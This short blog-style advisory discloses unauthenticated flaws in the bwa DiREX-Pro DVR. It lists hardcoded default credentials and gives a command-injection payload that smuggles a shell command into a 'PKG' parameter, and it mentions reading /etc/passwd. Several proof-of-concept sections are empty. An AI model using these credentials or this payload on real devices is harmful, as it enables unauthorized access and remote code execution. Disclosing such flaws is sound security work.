Saturday, March 7, 2020

[bwa] Multiple vulnerabilities in "DiREX-Pro"

Multiple vulnerabilities (Unauthenticated) in device type DVR, vendor bwa (http://www.meinbwa.de

Model Vulnerable, DiREX-Pro


POCS: 


1) Full Path Disclosure (FPD)

Sending Crafted HTTP requests




2) Password harcoded 



USERS  PASSWORDS
===================
user        user
archive   archive
admin     admin


2) Remote Code Execution (RCE): 

First need  download firmware:




Decompiled firmware analysis





PAYLOAD: 
PKG=;sh -c '/bin/ls -la /usr/local/www/cgi-bin/>/usr/local/www/out2';# 


Response



Other example: read /etc/passwd



Saludos,

 
biz.